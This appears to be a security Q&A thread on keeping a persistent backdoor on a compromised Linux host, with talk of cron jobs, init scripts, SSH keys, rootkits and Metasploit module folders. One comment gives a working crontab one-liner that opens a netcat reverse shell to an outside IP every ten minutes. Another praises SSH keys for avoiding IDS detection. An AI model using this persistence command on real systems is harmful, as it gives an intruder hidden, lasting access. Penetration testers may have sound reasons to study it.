# Is there an equivalent of meterpreter's "run persistence" for Linux?

Tags: metasploit

As in the question - how can I install a persistent backdoor with Metasploit on a Linux target?

Comment: typically that's done by injecting a cron job or a low level service in init.d

Comment: I Googled that adding an `authorized_keys` could probably also work, but I was wondering if there is any "standard" script that gathers those techniques.

Comment: it's really going to depend on the distro

Comment: ...which justifies creating a specialized script for that.

Comment: right - so there is no standard script - you'd need to write or find a 3rd party specialized script

Comment: With what level of privilege?

Comment: The current user's.

Comment: echo "*/10 * * * * root nc 192.168.20.9 12345 -e /bin/bash" >> /etc/crontab && service cron restart

Answer (score 1):

Any persistence modules for Linux would be found under than "Local" exploits here: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/local

Or in the Linux Post Modules: https://github.com/rapid7/metasploit-framework/tree/master/modules/post/linux

Or in the Multi Post Modules: https://github.com/rapid7/metasploit-framework/tree/master/modules/post/multi

I didn't see any that perform persistence, but like @d33tah said, usually persistence in Linux is simply editing the crontab to run something or installing SSH keys so that you can get back in. Or you can go the route of Kernel rootkits: http://www.securityfocus.com/tools/category/65

Comment: mubix covered the bases, but to throw my hat in, I am a big fan of dropping SSH keys on engagements. It's the most stable, has yielded the most success for me over the years, and is also encrypted communication, so the chances of getting caught by an IDS or IPS are pretty slim.